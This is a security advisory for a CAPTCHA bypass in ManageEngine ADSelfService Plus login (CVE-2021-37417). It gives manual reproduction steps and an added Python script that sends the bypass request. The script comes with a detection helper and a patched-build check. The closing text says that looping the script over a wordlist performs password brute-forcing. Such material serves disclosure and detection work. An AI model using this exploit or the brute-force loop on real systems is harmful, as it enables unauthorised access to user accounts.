Research & Development

CVE ID: CVE-2021-37417
Title: CAPTCHA bypass in login form via EXCLUDE_CAPTCHA parameter
CVSS score: 5.3 (Medium)
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
Affected product: ManageEngine ADSelfService Plus
Affected versions: < 6104
Credits: Krzysztof Andrusiak and Marcin Ogorzelski

Description: An unauthenticated user can bypass the CAPTCHA check on the login form by adding the EXCLUDE_CAPTCHA parameter to the login request. Because the CAPTCHA is what rate-limits automated login attempts, skipping it enables password brute-force attacks against the login endpoint.

Proof of concept:
  1. Enable the "Show CAPTCHA on Login Page every time" option in the ADSSP settings.
  2. Set up an intercepting proxy (e.g. Burp Suite).
  3. Go to the login page and enter a valid username and password. In the CAPTCHA field, enter any value.
  4. Intercept the HTTP POST request sent to the /j_security_check endpoint and add the EXCLUDE_CAPTCHA=true parameter to the request body.
  5. Forward the modified request to the server. The user is logged in despite having supplied a wrong CAPTCHA value.
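The steps above as a small script. This is an added example, not code from the advisory, from its authors or from the vendor. It assumes the servlet-spec field names j_username and j_password (the ones normally used with /j_security_check), a placeholder CAPTCHA field name "captcha", the default ADSelfService Plus HTTP port 8888, and that a successful form login answers with a redirect away from the login page while a failed one re-renders it; all four are assumptions, not facts stated in the advisory. It also includes a detection-side helper that flags a captured request body carrying the bypass parameter, and a build-number check against the fixed build 6104.

```python
"""Reproduce the CVE-2021-37417 request and check a capture for it.

Added example, not the advisory's own code. Field names, the default port
and the "redirect means success" rule are assumptions (see comments).
"""
import http.client
from urllib.parse import parse_qs, urlencode

LOGIN_PATH = "/j_security_check"
FIXED_BUILD = 6104  # first build without the bug, from the advisory ("< 6104")
DEFAULT_PORT = 8888  # assumption: ADSelfService Plus default HTTP port

# Assumed field names: j_username/j_password are the servlet-spec names used
# with j_security_check; "captcha" is a placeholder for the real field name.
USER_FIELD = "j_username"
PASS_FIELD = "j_password"
CAPTCHA_FIELD = "captcha"


def build_login_body(username, password, captcha="wrong", bypass=True):
    """Return the url-encoded POST body for /j_security_check.

    The CAPTCHA field deliberately carries a wrong value; with bypass=True the
    EXCLUDE_CAPTCHA=true parameter from the advisory is appended (step 4).
    """
    fields = {USER_FIELD: username, PASS_FIELD: password, CAPTCHA_FIELD: captcha}
    if bypass:
        fields["EXCLUDE_CAPTCHA"] = "true"
    return urlencode(fields)


def uses_captcha_bypass(body):
    """Detection helper: True if a captured form body to /j_security_check
    contains EXCLUDE_CAPTCHA with the value true (value compared case-insensitively)."""
    params = parse_qs(body, keep_blank_values=True)
    return any(v.strip().lower() == "true" for v in params.get("EXCLUDE_CAPTCHA", []))


def is_fixed_build(build):
    """True when the ADSelfService Plus build number is 6104 or later."""
    return int(str(build).strip()) >= FIXED_BUILD


def send_login(host, username, password, port=DEFAULT_PORT, use_tls=False, timeout=10):
    """Send the bypass request (step 5) and return (status, Location header).

    Assumption: a successful j_security_check login responds with a redirect
    (Location set) away from the login page; a failed one re-renders the form.
    """
    conn_cls = http.client.HTTPSConnection if use_tls else http.client.HTTPConnection
    conn = conn_cls(host, port, timeout=timeout)
    try:
        conn.request(
            "POST",
            LOGIN_PATH,
            body=build_login_body(username, password),
            headers={"Content-Type": "application/x-www-form-urlencoded"},
        )
        resp = conn.getresponse()
        return resp.status, resp.getheader("Location")
    finally:
        conn.close()


if __name__ == "__main__":
    import sys

    target, user, pwd = sys.argv[1:4]
    status, location = send_login(target, user, pwd)
    print("status:", status, "location:", location)
```

Run it as `python poc.py <host> <username> <password>` against a lab instance with the "Show CAPTCHA on Login Page every time" option enabled; a redirect despite the wrong CAPTCHA value confirms the bypass. The same `send_login` call placed in a loop over a wordlist is exactly the brute-force the missing CAPTCHA check permits, and `uses_captcha_bypass` is the check to run over proxy or WAF captures of POSTs to /j_security_check when hunting for it.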
Timeline:
  • 17-03-2021 - Vulnerability reported to the vendor
  • 18-03-2021 - First response from the vendor
  • 08-05-2021 - Fixed version (build 6104) released
  • 30-08-2021 - Public disclosure
  • 21-02-2022 - PoC released